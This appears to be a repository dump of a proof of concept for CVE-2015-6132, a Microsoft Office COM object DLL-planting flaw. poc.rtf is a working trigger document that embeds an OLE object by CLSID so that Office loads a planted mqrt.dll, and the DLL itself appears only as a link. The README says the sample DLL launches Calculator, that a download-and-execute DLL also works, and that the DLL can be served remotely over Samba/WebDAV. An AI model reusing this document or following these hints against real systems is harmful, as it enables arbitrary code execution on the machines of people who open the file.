├── .gitattributes
├── README.md
├── mqrt.dll
└── poc.rtf


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | 
 7 | # Standard to msysgit
 8 | *.doc	 diff=astextplain
 9 | *.DOC	 diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot  diff=astextplain
13 | *.DOT  diff=astextplain
14 | *.pdf  diff=astextplain
15 | *.PDF	 diff=astextplain
16 | *.rtf	 diff=astextplain
17 | *.RTF	 diff=astextplain
18 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2015-6132
 2 | Microsoft Office / COM Object DLL Planting 
 3 | 
 4 | Original poc:
 5 | https://www.exploit-db.com/exploits/38968/
 6 | 
 7 | Running poc.rtf with mqrt.dll in the same directory will trigger the dll, which in this case (pop calc)
 8 | making Down/exec Dll will work as well
 9 | 
10 | Exporting the dll to run from Samba/WebDav is possible
11 | 
12 | 
13 | https://twitter.com/hex00r
14 | 


--------------------------------------------------------------------------------
/mqrt.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hexx0r/CVE-2015-6132/0b157642fa8f64ba18f222fefefcce7e428dc0d6/mqrt.dll


--------------------------------------------------------------------------------
/poc.rtf:
--------------------------------------------------------------------------------
1 | {\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}


--------------------------------------------------------------------------------